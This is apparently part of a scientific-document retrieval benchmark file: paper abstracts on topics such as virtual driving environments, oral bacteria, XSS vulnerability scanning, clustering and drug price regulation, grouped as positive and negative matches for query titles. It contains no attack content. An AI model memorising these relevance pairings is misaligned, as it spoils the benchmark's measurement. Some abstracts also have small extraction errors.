"text": "As an initial assessment, over 480,000 labeled virtual images of normal highway driving were readily generated in Grand Theft Auto V's virtual environment. Using these images, a CNN was trained to detect following distance to cars/objects ahead, lane markings, and driving angle (angular heading relative to lane centerline): all variables necessary for basic autonomous driving. Encouraging results were obtained when tested on over 50,000 labeled virtual images from substantially different GTA-V driving environments. This initial assessment begins to define both the range and scope of the labeled images needed for training as well as the range and scope of labeled images needed for testing the definition of boundaries and limitations of trained networks. It is the efficacy and flexibility of a\"GTA-V\"-like virtual environment that is expected to provide an efficient well-defined foundation for the training and testing of Convolutional Neural Networks for safe driving. Additionally, described is the Princeton Virtual Environment (PVE) for the training, testing and enhancement of safe driving AI, which is being developed using the video-game engine Unity. PVE is being developed to recreate rare but critical corner cases that can be used in re-training and enhancing machine learning models and understanding the limitations of current self driving models. The Florida Tesla crash is being used as an initial reference.",
"title": ""
},
{
"docid": "c8b9efec71a72a1d0f0fc7170efba61d",
"text": "Microorganisms present in our oral cavity which are called the human micro flora attach to our tooth surfaces and develop biofilms. In maximum organic habitats microorganisms generally prevail as multispecies biolfilms with the help of intercellular interactions and communications among them which are the main keys for their endurance. These biofilms are formed by initial attachment of bacteria to a surface, development of a multi –dimensional complex structure and detachment to progress other site. The best example of biofilm formation is dental plaque. Plaque formation can lead to dental caries and other associated diseases causing tooth loss. Many different bacteria are involved in these processes and one among them is Streptococcus mutans which is the principle and the most important agent. When these infections become severe, during the treatment the bacterium can enter the bloodstream from the oral cavity and cause endocarditis. The oral bacterium S. mutans is greatly skilled in its mechanical modes of carbohydrate absorption. It also synthesizes polysaccharides that are present in dental plaque causing caries. As dental caries is a preventable disease major distinct approaches for its prevention are: carbohydrate diet, sugar substitutes, mechanical cleaning techniques, use of fluorides, antimicrobial agents, fissure sealants, vaccines, probiotics, replacement theory and dairy products and at the same time for tooth remineralization fluorides and casein phosphopeptides are extensively employed. The aim of this review article is to put forth the general features of the bacterium S.mutans and how it is involved in certain diseases like: dental plaque, dental caries and endocarditis.",
"title": ""
},
{
"docid": "34181f97c65266c0473b211b1034436b",
"text": "The LMS plays a decisive role in most eLearning environments. Although they integrate many useful tools for managing eLearning activities, they must also be effectively integrated with other specialized systems typically found in an educational environment such as Repositories of Learning Objects or ePortfolio Systems. Both types of systems evolved separately but in recent years the trend is to combine them, allowing the LMS to benefit from using the ePortfolio assessment features. This paper details the most common strategies for integrating an ePortfolio system into an LMS: the data, the API and the tool integration strategies. It presents a comparative study of strategies based on the technical skills, degree of coupling, security features, batch integration, development effort, status and standardization. This study is validated through the integration of two of the most representative systems on each category respectively Mahara and Moodle.",
"title": ""
}
] | scidocsrr |
a53117b8dde817ee8b492e8c71441c11 | Exploring the Spatial Hierarchy of Mixture Models for Human Pose Estimation | [
{
"docid": "1b777ff8e7c30c23e7cc827ec3aee0bc",
"text": "The task of 2-D articulated human pose estimation in natural images is extremely challenging due to the high level of variation in human appearance. These variations arise from different clothing, anatomy, imaging conditions and the large number of poses it is possible for a human body to take. Recent work has shown state-of-the-art results by partitioning the pose space and using strong nonlinear classifiers such that the pose dependence and multi-modal nature of body part appearance can be captured. We propose to extend these methods to handle much larger quantities of training data, an order of magnitude larger than current datasets, and show how to utilize Amazon Mechanical Turk and a latent annotation update scheme to achieve high quality annotations at low cost. We demonstrate a significant increase in pose estimation accuracy, while simultaneously reducing computational expense by a factor of 10, and contribute a dataset of 10,000 highly articulated poses.",
"title": ""
}
] | [
{
"docid": "9e1cefe8c58774ea54b507a3702f825f",
"text": "Organizations and individuals are increasingly impacted by misuses of information that result from security lapses. Most of the cumulative research on information security has investigated the technical side of this critical issue, but securing organizational systems has its grounding in personal behavior. The fact remains that even with implementing mandatory controls, the application of computing defenses has not kept pace with abusers’ attempts to undermine them. Studies of information security contravention behaviors have focused on some aspects of security lapses and have provided some behavioral recommendations such as punishment of offenders or ethics training. While this research has provided some insight on information security contravention, they leave incomplete our understanding of the omission of information security measures among people who know how to protect their systems but fail to do so. Yet carelessness with information and failure to take available precautions contributes to significant civil losses and even to crimes. Explanatory theory to guide research that might help to answer important questions about how to treat this omission problem lacks empirical testing. This empirical study uses protection motivation theory to articulate and test a threat control model to validate assumptions and better understand the ‘‘knowing-doing” gap, so that more effective interventions can be developed. 2008 Elsevier Ltd. All rights reserved. d. All rights reserved. Workman), wbommer@csufresno.edu (W.H. Bommer), dstraub@gsu.edu 2800 M. Workman et al. / Computers in Human Behavior 24 (2008) 2799–2816",
"title": ""
},
{
"docid": "c1500904d01c7210b4ed3de11f44bf79",
"text": "In this paper we propose an approach to improve the direct torque control (DTC) of an induction motor (IM). The proposed DTC is based on fuzzy logic technique switching table, is described compared with conventional direct torque control (DTC). To test the fuzzy control strategy a simulation platform using MATLAB/SIMULINK was built which includes induction motor d-q model, inverter model, fuzzy logic switching table and the stator flux and torque estimator. The simulation results verified the new control strategy.",
"title": ""
},
{
"docid": "737ccd74e69d32ab1fdfec7df9674a4c",
"text": "Data in the sciences frequently occur as sequences of multidimensional arrays called tensors. How can hidden, evolving trends in such data be extracted while preserving the tensor structure? The model that is traditionally used is the linear dynamical system (LDS) with Gaussian noise, which treats the latent state and observation at each time slice as a vector. We present the multilinear dynamical system (MLDS) for modeling tensor time series and an expectation–maximization (EM) algorithm to estimate the parameters. The MLDS models each tensor observation in the time series as the multilinear projection of the corresponding member of a sequence of latent tensors. The latent tensors are again evolving with respect to a multilinear projection. Compared to the LDS with an equal number of parameters, the MLDS achieves higher prediction accuracy and marginal likelihood for both artificial and real datasets.",
"title": ""
},
{
"docid": "a1a4b028fba02904333140e6791709bb",
"text": "Cross-site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to another user. XSS is one of the top 10 vulnerabilities on Web application. While a traditional cross-site scripting vulnerability exploits server-side codes, DOM-based XSS is a type of vulnerability which affects the script code being executed in the clients browser. DOM-based XSS vulnerabilities are much harder to be detected than classic XSS vulnerabilities because they reside on the script codes from Web sites. An automated scanner needs to be able to execute the script code without errors and to monitor the execution of this code to detect such vulnerabilities. In this paper, we introduce a distributed scanning tool for crawling modern Web applications on a large scale and detecting, validating DOMbased XSS vulnerabilities. Very few Web vulnerability scanners can really accomplish this.",
"title": ""
},
{
"docid": "8840e9e1e304a07724dd6e6779cfc9c4",
"text": "Clustering has become an increasingly important task in modern application domains such as marketing and purchasing assistance, multimedia, molecular biology as well as many others. In most of these areas, the data are originally collected at different sites. In order to extract information from these data, they are merged at a central site and then clustered. In this paper, we propose a different approach. We cluster the data locally and extract suitable representatives from these clusters. These representatives are sent to a global server site where we restore the complete clustering based on the local representatives. This approach is very efficient, because the local clustering can be carried out quickly and independently from each other. Furthermore, we have low transmission cost, as the number of transmitted representatives is much smaller than the cardinality of the complete data set. Based on this small number of representatives, the global clustering can be done very efficiently. For both the local and the global clustering, we use a density based clustering algorithm. The combination of both the local and the global clustering forms our new DBDC (Density Based Distributed Clustering) algorithm. Furthermore, we discuss the complex problem of finding a suitable quality measure for evaluating distributed clusterings. We introduce two quality criteria which are compared to each other and which allow us to evaluate the quality of our DBDC algorithm. In our experimental evaluation, we will show that we do not have to sacrifice clustering quality in order to gain an efficiency advantage when using our distributed clustering approach.",
"title": ""
},
{
"docid": "cd2fcc3e8ba9fce3db77c4f1e04ad287",
"text": "Technological advances are being made to assist humans in performing ordinary tasks in everyday settings. A key issue is the interaction with objects of varying size, shape, and degree of mobility. Autonomous assistive robots must be provided with the ability to process visual data in real time so that they can react adequately for quickly adapting to changes in the environment. Reliable object detection and recognition is usually a necessary early step to achieve this goal. In spite of significant research achievements, this issue still remains a challenge when real-life scenarios are considered. In this article, we present a vision system for assistive robots that is able to detect and recognize objects from a visual input in ordinary environments in real time. The system computes color, motion, and shape cues, combining them in a probabilistic manner to accurately achieve object detection and recognition, taking some inspiration from vision science. In addition, with the purpose of processing the input visual data in real time, a graphical processing unit (GPU) has been employed. The presented approach has been implemented and evaluated on a humanoid robot torso located at realistic scenarios. For further experimental validation, a public image repository for object recognition has been used, allowing a quantitative comparison with respect to other state-of-the-art techniques when realworld scenes are considered. Finally, a temporal analysis of the performance is provided with respect to image resolution and the number of target objects in the scene.",
"title": ""
},
{
"docid": "0a95cf6687a8e2421907fb94324c5163",
"text": "The existence of multiple memory systems has been proposed in a number of areas, including cognitive psychology, neuropsychology, and the study of animal learning and memory. We examine whether the existence of such multiple systems seems likely on evolutionary grounds. Multiple systems adapted to serve seemingly similar functions, which differ in important ways, are a common evolutionary outcome. The evolution of multiple memory systems requires memory systems to be specialized to such a degree that the functional problems each system handles cannot be handled by another system. We define this condition as functional incompatibility and show that it occurs for a number of the distinctions that have been proposed between memory systems. The distinction between memory for song and memory for spatial locations in birds, and between incremental habit formation and memory for unique episodes in humans and other primates provide examples. Not all memory systems are highly specialized in function, however, and the conditions under which memory systems could evolve to serve a wide range of functions are also discussed.",
"title": ""
},
{
"docid": "94a5e443ff4d6a6decdf1aeeb1460788",
"text": "Teaching the computer to understand language is the major goal in the field of natural language processing. In this thesis we introduce computational methods that aim to extract language structure— e.g. grammar, semantics or syntax— from text, which provides the computer with information in order to understand language. During the last decades, scientific efforts and the increase of computational resources made it possible to come closer to the goal of understanding language. In order to extract language structure, many approaches train the computer on manually created resources. Most of these so-called supervised methods show high performance when applied to similar textual data. However, they perform inferior when operating on textual data, which are different to the one they are trained on. Whereas training the computer is essential to obtain reasonable structure from natural language, we want to avoid training the computer using manually created resources. In this thesis, we present so-called unsupervisedmethods, which are suited to learn patterns in order to extract structure from textual data directly. These patterns are learned with methods that extract the semantics (meanings) of words and phrases. In comparison to manually built knowledge bases, unsupervised methods are more flexible: they can extract structure from text of different languages or text domains (e.g. finance or medical texts), without requiring manually annotated structure. However, learning structure from text often faces sparsity issues. The reason for these phenomena is that in language many words occur only few times. If a word is seen only few times no precise information can be extracted from the text it occurs. Whereas sparsity issues cannot be solved completely, information about most words can be gained by using large amounts of data. In the first chapter, we briefly describe how computers can learn to understand language. Afterwards, we present the main contributions, list the publications this thesis is based on and give an overview of this thesis. Chapter 2 introduces the terminology used in this thesis and gives a background about natural language processing. Then, we characterize the linguistic theory on how humans understand language. Afterwards, we show how the underlying linguistic intuition can be",
"title": ""
},
{
"docid": "3306636800566050599f051b0939b755",
"text": "We tackle image question answering (ImageQA) problem by learning a convolutional neural network (CNN) with a dynamic parameter layer whose weights are determined adaptively based on questions. For the adaptive parameter prediction, we employ a separate parameter prediction network, which consists of gated recurrent unit (GRU) taking a question as its input and a fully-connected layer generating a set of candidate weights as its output. However, it is challenging to construct a parameter prediction network for a large number of parameters in the fully-connected dynamic parameter layer of the CNN. We reduce the complexity of this problem by incorporating a hashing technique, where the candidate weights given by the parameter prediction network are selected using a predefined hash function to determine individual weights in the dynamic parameter layer. The proposed network-joint network with the CNN for ImageQA and the parameter prediction network-is trained end-to-end through back-propagation, where its weights are initialized using a pre-trained CNN and GRU. The proposed algorithm illustrates the state-of-the-art performance on all available public ImageQA benchmarks.",
"title": ""
},
{
"docid": "73e2c8e754c6a656ebe926c2d6d8225b",
"text": "In this work, we focus on the preservation of user privacy in the publication of sparse multidimensional data. Existing works protect the users’ sensitive information by generalizing or suppressing quasi identifiers in the original data. In many real world cases, neither generalization nor the distinction between sensitive and non-sensitive items is appropriate. For example, web search query logs contain millions of terms that are very hard to categorize as sensitive or non sensitive. At the same time, a generalization-based anonymization would remove the most valuable information in the dataset; the original terms. Motivated by this problem, we propose an anonymization technique termed disassociation that preserves the original terms but hides the fact that two or more different terms appear in the same record. Up to now, such techniques were used to sever the link between quasiidentifiers and sensitive values in settings with a clear distinction between these types of values. Our proposal generalizes these techniques for sparse multidimensional data, where no such distinction holds. We protect the users’ privacy by disassociating combinations of terms that can act as quasi-identifiers from the rest of the record or by disassociating the constituent terms, so that the identifying combination cannot be accurately recognized. To this end, we present an algorithm that anonymizes the data by first clustering them and then locally disassociating identifying combinations of terms. We analyze the attack model and extend the km-anonymity guaranty to the aforementioned setting. We empirically evaluate our method on real and synthetic datasets.",
"title": ""
},
{
"docid": "082f19bb94536f61a7c9e4edd9a9c829",
"text": "Phytoplankton abundance and composition and the cyanotoxin, microcystin, were examined relative to environmental parameters in western Lake Erie during late-summer (2003–2005). Spatially explicit distributions of phytoplankton occurred on an annual basis, with the greatest chlorophyll (Chl) a concentrations occurring in waters impacted by Maumee River inflows and in Sandusky Bay. Chlorophytes, bacillariophytes, and cyanobacteria contributed the majority of phylogenetic-group Chl a basin-wide in 2003, 2004, and 2005, respectively. Water clarity, pH, and specific conductance delineated patterns of group Chl a, signifying that water mass movements and mixing were primary determinants of phytoplankton accumulations and distributions. Water temperature, irradiance, and phosphorus availability delineated patterns of cyanobacterial biovolumes, suggesting that biotic processes (most likely, resource-based competition) controlled cyanobacterial abundance and composition. Intracellular microcystin concentrations corresponded to Microcystis abundance and environmental parameters indicative of conditions coincident with biomass accumulations. It appears that environmental parameters regulate microcystin indirectly, via control of cyanobacterial abundance and distribution.",
"title": ""
},
{
"docid": "dfca655ee52769c9c1d26e8c3f5b883f",
"text": "BACKGROUND\nDihydrocapsiate (DCT) is a natural safe food ingredient which is structurally related to capsaicin from chili pepper and is found in the non-pungent pepper strain, CH-19 Sweet. It has been shown to elicit the thermogenic effects of capsaicin but without its gastrointestinal side effects.\n\n\nMETHODS\nThe present study was designed to examine the effects of DCT on both adaptive thermogenesis as the result of caloric restriction with a high protein very low calorie diet (VLCD) and to determine whether DCT would increase post-prandial energy expenditure (PPEE) in response to a 400 kcal/60 g protein liquid test meal. Thirty-three subjects completed an outpatient very low calorie diet (800 kcal/day providing 120 g/day protein) over 4 weeks and were randomly assigned to receive either DCT capsules three times per day (3 mg or 9 mg) or placebo. At baseline and 4 weeks, fasting basal metabolic rate and PPEE were measured in a metabolic hood and fat free mass (FFM) determined using displacement plethysmography (BOD POD).\n\n\nRESULTS\nPPEE normalized to FFM was increased significantly in subjects receiving 9 mg/day DCT by comparison to placebo (p < 0.05), but decreases in resting metabolic rate were not affected. Respiratory quotient (RQ) increased by 0.04 in the placebo group (p < 0.05) at end of the 4 weeks, but did not change in groups receiving DCT.\n\n\nCONCLUSIONS\nThese data provide evidence for postprandial increases in thermogenesis and fat oxidation secondary to administration of dihydrocapsiate.\n\n\nTRIAL REGISTRATION\nclinicaltrial.govNCT01142687.",
"title": ""
},
{
"docid": "375b2025d7523234bb10f5f16b2b0764",
"text": "In this paper, we present a system including a novel component called programmable aperture and two associated post-processing algorithms for high-quality light field acquisition. The shape of the programmable aperture can be adjusted and used to capture light field at full sensor resolution through multiple exposures without any additional optics and without moving the camera. High acquisition efficiency is achieved by employing an optimal multiplexing scheme, and quality data is obtained by using the two post-processing algorithms designed for self calibration of photometric distortion and for multi-view depth estimation. View-dependent depth maps thus generated help boost the angular resolution of light field. Various post-exposure photographic effects are given to demonstrate the effectiveness of the system and the quality of the captured light field.",
"title": ""
},
{
"docid": "c444da1de06518f4b20db3ea99b327da",
"text": "Allowing computation to be performed at the edge of a network, edge computing has been recognized as a promising approach to address some challenges in the cloud computing paradigm, particularly to the delay-sensitive and mission-critical applications like real-time surveillance. Prevalence of networked cameras and smart mobile devices enable video analytics at the network edge. However, human objects detection and tracking are still conducted at cloud centers, as real-time, online tracking is computationally expensive. In this paper, we investigated the feasibility of processing surveillance video streaming at the network edge for real-time, uninterrupted moving human objects tracking. Moving human detection based on Histogram of Oriented Gradients (HOG) and linear Support Vector Machine (SVM) is illustrated for features extraction, and an efficient multi-object tracking algorithm based on Kernelized Correlation Filters (KCF) is proposed. Implemented and tested on Raspberry Pi 3, our experimental results are very encouraging, which validated the feasibility of the proposed approach toward a real-time surveillance solution at the edge of networks.",
"title": ""
},
{
"docid": "3b5555c5624fc11bbd24cfb8fff669f0",
"text": "Redundancy resolution is a critical problem in the control of robotic manipulators. Recurrent neural networks (RNNs), as inherently parallel processing models for time-sequence processing, are potentially applicable for the motion control of manipulators. However, the development of neural models for high-accuracy and real-time control is a challenging problem. This paper identifies two limitations of the existing RNN solutions for manipulator control, i.e., position error accumulation and the convex restriction on the projection set, and overcomes them by proposing two modified neural network models. Our method allows nonconvex sets for projection operations, and control error does not accumulate over time in the presence of noise. Unlike most works in which RNNs are used to process time sequences, the proposed approach is model-based and training-free, which makes it possible to achieve fast tracking of reference signals with superior robustness and accuracy. Theoretical analysis reveals the global stability of a system under the control of the proposed neural networks. Simulation results confirm the effectiveness of the proposed control method in both the position regulation and tracking control of redundant PUMA 560 manipulators.",
"title": ""
},
{
"docid": "eadc50aebc6b9c2fbd16f9ddb3094c00",
"text": "Instance segmentation is the problem of detecting and delineating each distinct object of interest appearing in an image. Current instance segmentation approaches consist of ensembles of modules that are trained independently of each other, thus missing opportunities for joint learning. Here we propose a new instance segmentation paradigm consisting in an end-to-end method that learns how to segment instances sequentially. The model is based on a recurrent neural network that sequentially finds objects and their segmentations one at a time. This net is provided with a spatial memory that keeps track of what pixels have been explained and allows occlusion handling. In order to train the model we designed a principled loss function that accurately represents the properties of the instance segmentation problem. In the experiments carried out, we found that our method outperforms recent approaches on multiple person segmentation, and all state of the art approaches on the Plant Phenotyping dataset for leaf counting.",
"title": ""
},
{
"docid": "fa58c34ecd5544069fa3c58130c0f941",
"text": "Design patterns provide good solutions to re-occurring problems and several patterns and methods how to apply them have been documented for safety-critical systems. However, due to the large amount of safety-related patterns and methods, it is difficult to get an overview of their capabilities and shortcomings as there currently is no survey on safety patterns and their application methods available in literature.\n To give an overview of existing pattern-based safety development methods, this paper presents existing methods from literature and discusses and compares several aspects of these methods such as the patterns and tools they use, their integration into a safety development process, or their maturity.",
"title": ""
},
{
"docid": "998bf65b2e95db90eb9fab8e13b47ff6",
"text": "Recently, deep neural networks (DNNs) have been regarded as the state-of-the-art classification methods in a wide range of applications, especially in image classification. Despite the success, the huge number of parameters blocks its deployment to situations with light computing resources. Researchers resort to the redundancy in the weights of DNNs and attempt to find how fewer parameters can be chosen while preserving the accuracy at the same time. Although several promising results have been shown along this research line, most existing methods either fail to significantly compress a well-trained deep network or require a heavy fine-tuning process for the compressed network to regain the original performance. In this paper, we propose the Block Term networks (BT-nets) in which the commonly used fully-connected layers (FC-layers) are replaced with block term layers (BT-layers). In BT-layers, the inputs and the outputs are reshaped into two low-dimensional high-order tensors, then block-term decomposition is applied as tensor operators to connect them. We conduct extensive experiments on benchmark datasets to demonstrate that BT-layers can achieve a very large compression ratio on the number of parameters while preserving the representation power of the original FC-layers as much as possible. Specifically, we can get a higher performance while requiring fewer parameters compared with the tensor train method.",
"title": ""
},
{
"docid": "ec7b348a0fe38afa02989a22aa9dcac2",
"text": "We propose a general framework for learning from labeled and unlabeled data on a directed graph in which the structure of the graph including the directionality of the edges is considered. The time complexity of the algorithm derived from this framework is nearly linear due to recently developed numerical techniques. In the absence of labeled instances, this framework can be utilized as a spectral clustering method for directed graphs, which generalizes the spectral clustering approach for undirected graphs. We have applied our framework to real-world web classification problems and obtained encouraging results.",
"title": ""
}
] | scidocsrr |
fb4c8f46186e497d3099f19e91d2c6b6 | On the Necessity of a Prescribed Block Validity Consensus: Analyzing Bitcoin Unlimited Mining Protocol | [
{
"docid": "a172cd697bfcb1f3d2a824bb6a5bb6d1",
"text": "Bitcoin provides two incentives for miners: block rewards and transaction fees. The former accounts for the vast majority of miner revenues at the beginning of the system, but it is expected to transition to the latter as the block rewards dwindle. There has been an implicit belief that whether miners are paid by block rewards or transaction fees does not affect the security of the block chain.\n We show that this is not the case. Our key insight is that with only transaction fees, the variance of the block reward is very high due to the exponentially distributed block arrival time, and it becomes attractive to fork a \"wealthy\" block to \"steal\" the rewards therein. We show that this results in an equilibrium with undesirable properties for Bitcoin's security and performance, and even non-equilibria in some circumstances. We also revisit selfish mining and show that it can be made profitable for a miner with an arbitrarily low hash power share, and who is arbitrarily poorly connected within the network. Our results are derived from theoretical analysis and confirmed by a new Bitcoin mining simulator that may be of independent interest.\n We discuss the troubling implications of our results for Bitcoin's future security and draw lessons for the design of new cryptocurrencies.",
"title": ""
},
{
"docid": "ed447f3f4bbe8478e9e1f3c4593dbf1b",
"text": "We revisit the fundamental question of Bitcoin's security against double spending attacks. While previous work has bounded the probability that a transaction is reversed, we show that no such guarantee can be effectively given if the attacker can choose when to launch the attack. Other approaches that bound the cost of an attack have erred in considering only limited attack scenarios, and in fact it is easy to show that attacks may not cost the attacker at all. We therefore provide a different interpretation of the results presented in previous papers and correct them in several ways. We provide different notions of the security of transactions that provide guarantees to different classes of defenders: merchants who regularly receive payments, miners, and recipients of large one-time payments. We additionally consider an attack that can be launched against lightweight clients, and show that these are less secure than their full node counterparts and provide the right strategy for defenders in this case as well. Our results, overall, improve the understanding of Bitcoin's security guarantees and provide correct bounds for those wishing to safely accept transactions.",
"title": ""
}
] | [
{
"docid": "45c48cce2e2d7fbdea1afc51c7c6ad26",
"text": "9",
"title": ""
},
{
"docid": "a4fbb63fa62ec2985b395521d51191dd",
"text": "Deep Neural Networks expose a high degree of parallelism, making them amenable to highly data parallel architectures. However, data-parallel architectures often accept inefficiency in individual computations for the sake of overall efficiency. We show that on average, activation values of convolutional layers during inference in modern Deep Convolutional Neural Networks (CNNs) contain 92% zero bits. Processing these zero bits entails ineffectual computations that could be skipped. We propose Pragmatic (PRA), a massively data-parallel architecture that eliminates most of the ineffectual computations on-the-fly, improving performance and energy efficiency compared to state-of-the-art high-performance accelerators [5]. The idea behind PRA is deceptively simple: use serial-parallel shift-and-add multiplication while skipping the zero bits of the serial input. However, a straightforward implementation based on shift-and-add multiplication yields unacceptable area, power and memory access overheads compared to a conventional bit-parallel design. PRA incorporates a set of design decisions to yield a practical, area and energy efficient design.\n Measurements demonstrate that for convolutional layers, PRA is 4.31X faster than DaDianNao [5] (DaDN) using a 16-bit fixed-point representation. While PRA requires 1.68X more area than DaDN, the performance gains yield a 1.70X increase in energy efficiency in a 65nm technology. With 8-bit quantized activations, PRA is 2.25X faster and 1.31X more energy efficient than an 8-bit version of DaDN.",
"title": ""
},
{
"docid": "aa45f36e893c17fd364051b7b8d4c9b4",
"text": "Identifying the location of performance bottlenecks is a non-trivial challenge when scaling n-tier applications in computing clouds. Specifically, we observed that an n-tier application may experience significant performance loss when there are transient bottlenecks in component servers. Such transient bottlenecks arise frequently at high resource utilization and often result from transient events (e.g., JVM garbage collection) in an n-tier system and bursty workloads. Because of their short lifespan (e.g., milliseconds), these transient bottlenecks are difficult to detect using current system monitoring tools with sampling at intervals of seconds or minutes. We describe a novel transient bottleneck detection method that correlates throughput (i.e., request service rate) and load (i.e., number of concurrent requests) of each server in an n-tier system at fine time granularity. Both throughput and load can be measured through passive network tracing at millisecond-level time granularity. Using correlation analysis, we can identify the transient bottlenecks at time granularities as short as 50ms. We validate our method experimentally through two case studies on transient bottlenecks caused by factors at the system software layer (e.g., JVM garbage collection) and architecture layer (e.g., Intel SpeedStep).",
"title": ""
},
{
"docid": "cab91b728b363f362535758dd9ac57b3",
"text": "The multimodal nature of speech is often ignored in human-computer interaction, but lip deformations and other body motion, such as those of the head, convey additional information. We integrate speech cues from many sources and this improves intelligibility, especially when the acoustic signal is degraded. This paper shows how this additional, often complementary, visual speech information can be used for speech recognition. Three methods for parameterizing lip image sequences for recognition using hidden Markov models are compared. Two of these are top-down approaches that fit a model of the inner and outer lip contours and derive lipreading features from a principal component analysis of shape or shape and appearance, respectively. The third, bottom-up, method uses a nonlinear scale-space analysis to form features directly from the pixel intensity. All methods are compared on a multitalker visual speech recognition task of isolated letters.",
"title": ""
},
{
"docid": "9027f5db4917113f9dd658caddda4f88",
"text": "In this paper, two different types of ultra-fast electromechanical actuators are compared using a multi-physical finite element simulation model that has been experimentally validated. They are equipped with a single-sided Thomson coil (TC) and a double-sided drive coil (DSC), respectively. The former consists of a spirally-wound flat coil with a copper armature on top, while the latter consists of two mirrored spiral coils that are connected in series. Initially, the geometry and construction of each of the actuating schemes are discussed. Subsequently, the theory behind the two force generation principles are described. Furthermore, the current, magnetic flux densities, accelerations, and induced stresses are analyzed. Moreover, mechanical loadability simulations are performed to study the impact on the requirements of the charging unit, the sensitivity of the parameters, and evaluate the degree of influence on the performance of both drives. Finally, it is confirmed that although the DSC is mechanically more complex, it has a greater efficiency than that of the TC.",
"title": ""
},
{
"docid": "79c1237142f82b3e316e784c45fd68c6",
"text": "The incidence of chronic osteomyelitis is increasing because of the prevalence of predisposing conditions such as diabetes mellitus and peripheral vascular disease. The increased availability of sensitive imaging tests, such as magnetic resonance imaging and bone scintigraphy, has improved diagnostic accuracy and the ability to characterize the infection. Plain radiography is a useful initial investigation to identify alternative diagnoses and potential complications. Direct sampling of the wound for culture and antimicrobial sensitivity is essential to target treatment. The increased incidence of methicillin-resistant Staphylococcus aureus osteomyelitis complicates antibiotic selection. Surgical debridement is usually necessary in chronic cases. The recurrence rate remains high despite surgical intervention and long-term antibiotic therapy. Acute hematogenous osteomyelitis in children typically can be treated with a four-week course of antibiotics. In adults, the duration of antibiotic treatment for chronic osteomyelitis is typically several weeks longer. In both situations, however, empiric antibiotic coverage for S. aureus is indicated.",
"title": ""
},
{
"docid": "51ddbc18a9e5a460038676b7d5dc6f10",
"text": "The selection, development, or comparison of machine learning methods in data mining can be a difficult task based on the target problem and goals of a particular study. Numerous publicly available real-world and simulated benchmark datasets have emerged from different sources, but their organization and adoption as standards have been inconsistent. As such, selecting and curating specific benchmarks remains an unnecessary burden on machine learning practitioners and data scientists. The present study introduces an accessible, curated, and developing public benchmark resource to facilitate identification of the strengths and weaknesses of different machine learning methodologies. We compare meta-features among the current set of benchmark datasets in this resource to characterize the diversity of available data. Finally, we apply a number of established machine learning methods to the entire benchmark suite and analyze how datasets and algorithms cluster in terms of performance. From this study, we find that existing benchmarks lack the diversity to properly benchmark machine learning algorithms, and there are several gaps in benchmarking problems that still need to be considered. This work represents another important step towards understanding the limitations of popular benchmarking suites and developing a resource that connects existing benchmarking standards to more diverse and efficient standards in the future.",
"title": ""
},
{
"docid": "fe3afe69ec27189400e65e8bdfc5bf0b",
"text": "speech learning changes over the life span and to explain why \"earlier is better\" as far as learning to pronounce a second language (L2) is concerned. An assumption we make is that the phonetic systems used in the production and perception of vowels and consonants remain adaptive over the life span, and that phonetic systems reorganize in response to sounds encountered in an L2 through the addition of new phonetic categories, or through the modification of old ones. The chapter is organized in the following way. Several general hypotheses concerning the cause of foreign accent in L2 speech production are summarized in the introductory section. In the next section, a model of L2 speech learning that aims to account for age-related changes in L2 pronunciation is presented. The next three sections present summaries of empirical research dealing with the production and perception of L2 vowels, word-initial consonants, and word-final consonants. The final section discusses questions of general theoretical interest, with special attention to a featural (as opposed to a segmental) level of analysis. Although nonsegmental (Le., prosodic) dimensions are an important source of foreign accent, the present chapter focuses on phoneme-sized units of speech. Although many different languages are learned as an L2, the focus is on the acquisition of English.",
"title": ""
},
{
"docid": "4d59fd865447cfd1d54623e267af491c",
"text": "Visual relationships capture a wide variety of interactions between pairs of objects in images (e.g. “man riding bicycle” and “man pushing bicycle”). Consequently, the set of possible relationships is extremely large and it is difficult to obtain sufficient training examples for all possible relationships. Because of this limitation, previous work on visual relationship detection has concentrated on predicting only a handful of relationships. Though most relationships are infrequent, their objects (e.g. “man” and “bicycle”) and predicates (e.g. “riding” and “pushing”) independently occur more frequently. We propose a model that uses this insight to train visual models for objects and predicates individually and later combines them together to predict multiple relationships per image. We improve on prior work by leveraging language priors from semantic word embeddings to finetune the likelihood of a predicted relationship. Our model can scale to predict thousands of types of relationships from a few examples. Additionally, we localize the objects in the predicted relationships as bounding boxes in the image. We further demonstrate that understanding relationships can improve content based image retrieval.",
"title": ""
},
{
"docid": "9af37841feed808345c39ee96ddff914",
"text": "Wake-up receivers (WuRXs) are low-power radios that continuously monitor the RF environment to wake up a higher-power radio upon detection of a predetermined RF signature. Prior-art WuRXs have 100s of kHz of bandwidth [1] with low signature-to-wake-up-signal latency to help synchronize communication amongst nominally asynchronous wireless devices. However, applications such as unattended ground sensors and smart home appliances wake-up infrequently in an event-driven manner, and thus WuRX bandwidth and latency are less critical; instead, the most important metrics are power consumption and sensitivity. Unfortunately, current state-of-the-art WuRXs utilizing direct envelope-detecting [2] and IF/uncertain-IF [1,3] architectures (Fig. 24.5.1) achieve only modest sensitivity at low-power (e.g., −39dBm at 104nW [2]), or achieve excellent sensitivity at higher-power (e.g., −97dBm at 99µW [3]) via active IF gain elements. Neither approach meets the needs of next-generation event-driven sensing networks.",
"title": ""
},
{
"docid": "5ca5cfcd0ed34d9b0033977e9cde2c74",
"text": "We study the impact of regulation on competition between brand-names and generics and pharmaceutical expenditures using a unique policy experiment in Norway, where reference pricing (RP) replaced price cap regulation in 2003 for a sub-sample of o¤-patent products. First, we construct a vertical di¤erentiation model to analyze the impact of regulation on prices and market shares of brand-names and generics. Then, we exploit a detailed panel data set at product level covering several o¤-patent molecules before and after the policy reform. O¤-patent drugs not subject to RP serve as our control group. We
nd that RP signi
cantly reduces both brand-name and generic prices, and results in signi
cantly lower brand-name market shares. Finally, we show that RP has a strong negative e¤ect on average molecule prices, suggesting signi
cant cost-savings, and that patients copayments decrease despite the extra surcharges under RP. Key words: Pharmaceuticals; Regulation; Generic Competition JEL Classi
cations: I11; I18; L13; L65 We thank David Bardey, Øivind Anti Nilsen, Frode Steen, and two anonymous referees for valuable comments and suggestions. We also thank the Norwegian Research Council, Health Economics Bergen (HEB) for
